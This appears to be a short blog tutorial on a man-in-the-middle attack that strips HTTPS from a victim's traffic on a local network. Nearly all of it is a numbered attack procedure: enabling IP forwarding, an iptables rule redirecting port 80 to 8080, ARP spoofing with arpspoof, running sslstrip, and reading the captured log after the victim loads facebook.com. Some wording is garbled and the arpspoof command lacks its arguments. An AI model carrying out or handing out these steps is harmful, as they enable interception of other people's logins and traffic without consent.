MITM attack over HTTPS

MITM attack transparently hijacks HTTP traffic on a network with SSLStrip, searches for HTTPS links and redirects and maps these links into similar HTTP connections or comparable HTTPs.

It also supports modes to offer a favicon that looks like a lock icon, selective logging and denial of session.

Step 1: We should set our machine in forwarding modes to enable our machine to forward every packet not intended for your machine.

echo 1 > /proc/sys/net/ipv4/ip_forward

Step 2: Iptables must be set to redirect traffic from port 80 to port 8080.

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080

Step 3: You need to find our network gateway!

route -n

Step 4: We have to find our target host IP address MITM attachment over HTTPS connection with SSLStrip.

Step 5: ARP spoofing is a tactic by which an attacker is sending (spoofed) Address Resolution Protocol (ARP) messages onto a local area network.

arpspoof -i -t

Step 6: Now we have to listen to port 8080, by opening a new terminal window.

sslstrip -l 8080

Step 7: Now we should go to the Victim Machine. For example facebook.com in the browser, since we know that facebook will go with HTTPS, but now we can check with Victim Machine, we can see a link formed with HTTP.

Step 8: Now go to Home folder and test the sslstrip.log file.

LEAVE A REPLY

Please enter your comment!
Please enter your name here